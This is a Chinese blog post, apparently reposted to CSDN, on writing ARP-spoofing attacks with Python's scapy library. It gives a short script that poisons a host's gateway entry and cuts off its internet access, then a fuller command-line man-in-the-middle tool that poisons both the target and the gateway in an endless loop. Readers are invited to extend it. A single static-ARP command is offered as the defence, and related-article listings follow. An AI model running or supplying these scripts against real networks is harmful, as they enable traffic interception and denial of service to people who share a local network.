Python scapy实现一个简易arp攻击脚本

最新推荐文章于 2024-09-18 23:38:44 发布
最新推荐文章于 2024-09-18 23:38:44 发布
阅读量5k 收藏 47
点赞数 8
分类专栏: SDN

Pip3 安装:

apt-get install python3-pip

scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

scapy的安装在Linux非常便利,但在Windows下比较复杂。

以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。

scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:

sudo pip3 install scapy-python3

以下是一个非常简单的arp攻击演示脚本,该脚本可以在实验环境下帮助你理解arp协议的作用和原理,当然你甚至可以扩充该脚本去编写一个完整的arp攻击工具。

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ARP攻击演示脚本/arpDemo.py


from scapy.all import (
    Ether,
    ARP,
    sendp
)
# 注意这里面的几个方法
# Ether用来构建以太网数据包
# ARP是构建ARP数据包的类
# sendp方法在第二层发送数据包

# Ether用来构建以太网数据包
eth = Ether()
arp = ARP(
    # 代表ARP请求或者响应
    op="is-at",
 
    # 发送方Mac地址/毒化记录中的MAC
    hwsrc="08:00:27:97:d1:f5",
    # 发送方IP地址/毒化记录中的IP
    psrc="192.168.31.1",
 
    # 目标Mac地址/被欺骗主机MAC
    hwdst="2C:56:DC:D3:AB:DB",
    # 目标IP地址/被欺骗主机IP地址
    pdst="192.168.31.248"
 
    # 意思就是告诉192.168.31.248这个地址的主机,IP为192.168.31.100的主机MAC地址是08:00:27:97:d1:f5
    # 如果不写目标主机的IP和MAC则默认以广播的形式发送
)
# scapy重载了"/"操作符,可以用来表示两个协议层的组合
# 这里我们输出一下数据包的结构信息
print((eth/arp).show())

# 发送封包,并且每间隔1秒重复发送
sendp(eth/arp, inter=2, loop=1)

攻击前我们在主机上看一下arp缓存的记录

arp -a

攻击前的arp缓存记录

执行脚本:

sudo python3 arpDemo.py

攻击后的arp缓存记录

这里我们是对主机的网关记录进行篡改,在执行了攻击脚本后主机已经无法正常访问互联网了。

如果你要防范这种攻击也很简单,直接将IP和MAC地址的关系绑定写入arp缓存即可。
在windows你可以通过arp命令完成,Linux下与此操作相似。

#添加静态项
arp -s 192.168.31.1   64-09-80-04-aa-c3

下面是一个更加复杂的中间人攻击脚本范例
你可以进一步的去完善它

#!/usr/bin/python3
# -*- coding: utf-8 -*-
'''
ARP 攻击脚本
'''
 
import argparse
import threading
import time
 
from scapy.all import ARP, Ether, get_if_hwaddr, sendp
from scapy.layers.l2 import getmacbyip
 
 
# 注意这里面的几个方法
 
# Ether用来构建以太网数据包
# ARP是构建ARP数据包的类
# sendp方法在第二层发送数据包
# getmacbyip方法用于通过ip获取mac地址
# get_if_hwaddr方法获取指定网卡的mac地址
 
def get_mac(tgt_ip):
    '''
    调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。
    '''
    tgt_mac = getmacbyip(tgt_ip)
    if tgt_mac is not None:
        return tgt_mac
    else:
        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活"%tgt_ip)
 
 
def create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip):
    '''
    生成ARP数据包,伪造网关欺骗目标计算机
    src_mac:本机的MAC地址,充当中间人
    tgt_mac:目标计算机的MAC
    gateway_ip:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击
    tgt_ip:目标计算机的IP
    op=is-at,表示ARP响应
    '''
    eth = Ether(src=src_mac, dst=tgt_mac)
    arp = ARP(hwsrc=src_mac, psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at")
    pkt = eth / arp
    return pkt
 
def create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip):
    '''
    生成ARP数据包,伪造目标计算机欺骗网关
    src_mac:本机的MAC地址,充当中间人
    gateway_mac:网关的MAC
    tgt_ip:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击
    gateway_ip:网关的IP
    op=is-at,表示ARP响应
    '''
    eth = Ether(src=src_mac, dst=gateway_mac)
    arp = ARP(hwsrc=src_mac, psrc=tgt_ip, hwdst=gateway_mac, pdst=gateway_ip, op="is-at")
    pkt = eth / arp
    return pkt
 
 
def main():
    """
    主方法
    """
    description = "ARP攻击脚本"
    parser = argparse.ArgumentParser(description=description)
 
    parser.add_argument('-sm', dest='srcmac', type=str, help='发送源计算机的MAC,如果不提供,默认将采用本机的MAC地址')
    parser.add_argument('-t', dest='targetip', type=str, help='指定目标计算机IP', required=True)
    parser.add_argument('-tm', dest='targetmac', type=str, help='指定目标计算机MAC,如果不提供,默认将根据其IP获取MAC地址')
    parser.add_argument('-g', dest='gatewayip', type=str, help='指定网关IP', required=True)
    parser.add_argument('-gm', dest='gatewaymac', type=str, help='指定网关MAC,如果不提供,默认将根据其IP获取MAC地址')
    parser.add_argument('-i', dest='interface', type=str, help='指定使用的网卡', required=True)
    parser.add_argument('-a', dest='allarp', action='store_true', help='是否进行全网arp欺骗')
 
    args = parser.parse_args()
 
    tgt_ip = args.targetip
    gateway_ip = args.gatewayip
    interface = args.interface
 
    srcmac = args.srcmac
    targetmac = args.targetmac
    gatewaymac = args.gatewaymac
 
    if tgt_ip is None or gateway_ip is None or interface is None:
        print(parser.print_help())
        exit(0)
 
    src_mac = srcmac
    if src_mac is None:
        src_mac = get_if_hwaddr(interface)
 
    print('本机MAC地址是:', src_mac)
    print("目标计算机IP地址是:", tgt_ip)
 
    tgt_mac = targetmac
    if tgt_mac is None:
        tgt_mac = get_mac(tgt_ip)
 
    print("目标计算机MAC地址是:", tgt_mac)
    print("网关IP地址是:", gateway_ip)
 
    gateway_mac = gatewaymac
    if gateway_mac is None:
        gateway_mac = get_mac(gateway_ip)
 
    print("网关MAC地址是:", gateway_mac)
 
    input('按任意键继续:')
 
    pkt_station = create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip)
    pkt_gateway = create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip)

    # 如果不展示发送情况的话下面的语句可以更加简便直接用sendp方法提供的功能循环发送即可,不需要多线程和死循环。
    # sendp(pkt_station, inter=1, loop=1)
    # sendp(pkt_gateway, inter=1, loop=1)

    i = 1
    while True:
        t = threading.Thread(
            target=sendp,
            args=(pkt_station,),
            kwargs={'inter':1, 'iface':interface}
        )
        t.start()
        t.join()
        print(str(i) + " [*]发送一个计算机ARP欺骗包")
 
        s = threading.Thread(
            target=sendp,
            args=(pkt_gateway,),
            kwargs={'inter':1, 'iface':interface}
        )
        s.start()
        s.join()
 
        print(str(i) + " [*]发送一个网关ARP欺骗包")
        i += 1
        time.sleep(1)
 
if __name__ == '__main__':
    main()



作者:爱捣腾的吴大爷
链接:https://www.jianshu.com/p/df5918069612
來源:简书
简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

lihui是猪
关注
专栏目录
python写的ARP攻击代码实例
01-20
注:使用这个脚本需要安装scapy 包最好在linux平台下使用,因为scapy包在windows上安装老是会有各种问题 复制代码 代码如下:#coding:utf-8#example :sudo python arp_dos.py 192.168.1.103 from scapy.all import ...
Python基于scapy完成ARP欺骗
qq_53830529的博客
05-18 672
使用pythonscapy库模拟ARP欺骗,实现让被攻击主机的流量也能让攻击主机抓取
scapy进行arp攻击
python_xhw的博客
09-03 721
该代码使用ARP欺骗攻击攻击者的MAC地址发送给目标主机,并伪造源IP地址。由于ARP缓存记录会优先使用最近的条目,当目标主机收到欺骗的ARP响应时,它会更新自己的ARP缓存记录。这导致目标主机将流量发送到攻击者的MAC地址,从而实现ARP攻击Scapy一个Python编写的交互式数据包操作程序和库。它可以用于创建、发送和捕获网络数据包,并实现各种网络协议。
基于pythonARP欺骗攻击设计与实现
最新发布
zz10986708的博客
09-18 1228
可以利用Python中的traceroute()函数,该函数可以模拟路由跟踪的过程,用于确定网络中路由路径和连接函数,在这个函数中,我们通过传入一个目标网址(这里是www.baidu.com)和一个最大的TTL值为一跳,来获取到目标网址的第一跳路由器的IP地址,也就是本地网络的网关地址。最后将获取到的网关IP地址返回。以太网帧是网络通信中的基本单位,其中包含了数据的传输信息和控制信息,在以太网帧中,数据长度的最小值为46字节,当数据包长度不足46字节时,需要使用填充位将其补满,以达到最小长度的要求。
scapy(一):简介及实现ARP攻击
jpygx123的博客
11-20 8073
Scapy一个强大的交互式数据包处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。 最重要的他还有很多更优秀的特性——发送无效数据帧、注入修改的802.11数据帧、在WEP上解码加密通道(VOIP)、ARP缓存攻击(VLAN) 等,这也是其他工具无法处理完成的。 用scapy构造数据包 在 Scapy 中可以用特别简单的方法...
arp攻击 python_ARP攻击python实现
weixin_30624835的博客
01-26 1441
1. 前言代码参考:https://github.com/byt3bl33d3r/arpspoof/blob/master/arpspoof/arpspoof.py题目描述:任务三:网络协议堆栈渗透测试任务环境说明:服务器场景:WindowsServer18065服务器场景操作系统:Windows2003 Server服务器场景FTP下载服务用户名:anonymous,密码:123456服务器场景...
scapy学习arp欺骗
cracker_zhou的博客
02-04 7968
在以太网协议中规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须要知道目标主机的MAC地址。于是需要一种方法,根据目的主机的IP地址,获得其MAC地址。这就是ARP协议要做的事情。所谓地址解析(address resolution)就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。   地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息
scapy-MITM:使用Scapy进行ARP毒化的小型python脚本,并使用iptables进行IPTM重定向以进行MITM攻击。 用于https
05-02
替补使用Scapy的小型python脚本使用Linux内置的Iptables进行ARP中毒和IP地址重定向,以执行MITM攻击。 目前,它的测试很有限,这意味着当心它不起作用。 另外,这会弄乱您的Iptable配置的规则,因此,如果您关心这种...
python_scapy
03-17
ScapyPython编程语言中一个强大的网络协议构造和分析库,它允许开发人员创建、修改和发送几乎任何网络协议的数据包。"python_scapy"这个项目显然与使用Python 3版本的Scapy库相关,主要涉及到网络嗅探、数据包构建...
python2.7使用scapy发送syn实例
09-16
Scapy一个强大的 Python 库,用于创建、发送、接收和解析网络数据包。下面的代码展示了一个基本的 SYN 数据包发送过程: ```python from scapy.all import * def send_syn(): # 设置源 IP 和端口 src_ip = '...
Scapy_库_ARP_Scanner
07-27
ScapyARP Scanner 是一个使用 PythonScapy 实现ARP.Scanner脚本,用于扫描局域网中的主机。下面是 ScapyARP Scanner 的知识点总结: 一、Scapy 库介绍 Scapy 库是一个功能强大的网络探测和安全测试...
ARP协议及局域网断网攻击scapy
qq_43140627的博客
11-22 1720
ARP协议攻击 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主...
chatgpt赋能pythonPython能入侵服务器吗?
laingziwei的博客
06-26 213
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
Python】使用scapy模块编写ARP欺骗脚本
Monsterlz123的博客
07-07 2735
Python】使用scapy模块编写ARP欺骗脚本 Hello,各位小伙伴们周末好~ 今天复习自己公众号写的文章,小编发现脚本模块现在只挂着两篇文章… 赶紧写起来!!!(公众号逼我学习系列~) 最近决定发奋图强,写多篇python脚本相关的东西 今天我们先来写一个简单的ARP欺骗脚本练练手吧~ 一、scapy工具 我们编写ARP欺骗脚本需要用到scapy模块,利用该模块我们根据自己的需要...
Python 实现ARP与DNS欺骗
CSDN
05-28 5401
Scapy一个Python编写的强大网络数据包处理库,它提供了创建、发送、解析和操作网络数据包的功能。Scapy允许开发人员以编程方式构建各种类型的网络工具和应用,包括网络扫描、协议分析、网络攻击和防御等。
使用 Scapy 库编写 ARP 欺骗攻击脚本
Flag少侠的博客
03-26 1840
ARP(Address Resolution Protocol)缓存中毒是一种网络攻击,它利用了ARP协议中的漏洞,通过欺骗或篡改网络中的ARP缓存来实施攻击ARP协议是用于将IP地址映射到物理MAC地址的协议,在IPv4网络中,每台计算机都有一个ARP缓存,用于保存IP地址到MAC地址的映射关系,以便进行网络通信。
【网络攻击手段之-----ARP欺骗】
qq_53058639的博客
01-29 2124
本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP的欺骗攻击ARP 欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行ARP 欺骗攻击。做一个遵纪守法的公民,从我做起!!!ARP (Address Resolution Protocol) 是一种网络层协议,用于将 IP 地址转换为物理地址(MAC地址)。在局域网中,每台设备都有唯一的 MAC 地址,而 IP 地址是可以重复分配的。因此,当一个设备需要发送数据到另一个设备时,它需要知道另一个设备的MAC 地址。
python编写arp攻击与欺骗脚本
dhdichch的博客
05-29 3018
目录 1.arp欺骗 2.arp欺骗实验 2.1 构造arp包 2.2 发送数据包 2.3 查看路由表 3.完善arp欺骗过程 4. 编写arp欺骗脚本 1.arp欺骗 arp欺骗是数据链路层的攻击,在数据链路层是通过mac地址来发送报文的,所以需要将网络层的ip对应到mac地址,由于arp协议是基于局域网内主机互相信任的基础上的,如果我们构造并发送了一个arp欺骗包,就可以实现arp欺骗。 2.arp欺骗实验 攻击者:kali,192.168.20.128,29:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值